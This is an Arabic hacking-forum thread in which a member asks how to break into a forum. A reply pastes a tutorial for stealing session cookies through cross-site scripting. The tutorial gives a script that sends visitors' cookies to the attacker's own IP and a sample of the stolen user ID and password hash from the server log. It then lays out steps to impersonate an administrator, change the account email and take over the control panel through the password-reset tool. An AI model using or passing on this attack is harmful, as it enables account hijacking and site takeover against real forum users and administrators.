|
|
|
|||
|
|
|
|
||
|
|||||||
 |
 |
 |
| شامل الهكرز والحماية كل مايتعلق بالهكرز وأساليبهم والحماية منهم . |
 |
|
|
LinkBack | أدوات الموضوع | تقييم الموضوع | أنماط العرض |
10-03-2002, 03:33 PM
|
#1 (permalink) | |||||||
|
شاملي راعي محل
|
شباب...كيف اخترق منتدى لا يدعم الاش تي بي...
شباب في منتدى جديد وما اعتقد انو عليه حماية... يعني اكيد سهل اختراقة ...كيف ممكن اخترقة... علما انه ما يدعم لغة HTML بلييييييييز... هلببببببب:tposts __________________ |
|||||||
|
|
|
|
|
|
|
09-10-2007, 12:19 PM
|
#2 (permalink) | |||||||
|
شاملي جديد
|
رد: شباب...كيف اخترق منتدى لا يدعم الاش تي بي...
أخى هذا هو الشرح حصلت عليه
================================ السلام عليكم ورحمه الله وبركآته بسم الله الرحمن الرحيم الشرح تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML .. قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود : <******>document.write('<img src="http://my_ip_address/'+document.******+'">';</******> مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك . وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) . وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك .. مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log . ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ ابحث عن الكود الخاص بالباسورد .. مثال : GET/ bbuserid=86;%20bbpassword=dd61 69d68822a116cd97e1fb ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f 8;%20bbthreadview[54 20]=1012444064;%20bblastvi sit=1011983161 فكر قليلا الان .. اين الباسورد ؟؟ الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟ قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل فقط الأعضاء المسجلين يمكنهم رؤية الروابط قم بتسجيل الدخول اولا [نشط عضويتي] - [طلب كود التنشيط] - [نسيت كلمة السر] - [لأصحاب ايميلات الهوتميل ] - [تسجيل كعضو جديد] [userid]&bbpassword=[password hash]ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) " في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) .. لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن .. اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. ! م.ن.ق.و.ل للفائده عاد نبي احد من الاخوان يتحفنا في سيرفر اباتشي للتجربه تحياتي لكم آخر تحرير بواسطة oshene : 09-10-2007 الساعة 12:21 PM. السبب: تعديل فى الموضوع |
|||||||
|
|
|
|
| مستخدمين موجودين حالياً يشاهدون الموضوع: 1 (0 أعضاء و1 ضيوف) | |
| أدوات الموضوع | |
| أنماط العرض | تقييم هذا الموضوع |
|
|
مواضيع مشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | ردود | آخر مشاركة |
| كيف تحققين أهدافك الدعوية من خلال النشاط ؟ | mohashish | شـــامل دين ودنيا | 1 | 12-27-2005 01:21 AM |
 |
 |
| تصميم وبرمجة فريق لمسة فن | المستضيف الرسمي |
| منتديات | دليل مواقع | اقوى 100 موقع عربي | ازياء | شات | شات | دردشة |
| اصحاب كول | افلام | برامج كاملة | دردشة | صور | دليل توتو | منتديات حريم |
| اضف وصلتك | اضف وصلتك | اضف وصلتك | مركز تحميل | إدارات نت لـ تدريب عن بعد | دردشة | شات |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63
 |
 |
النمط الخطي
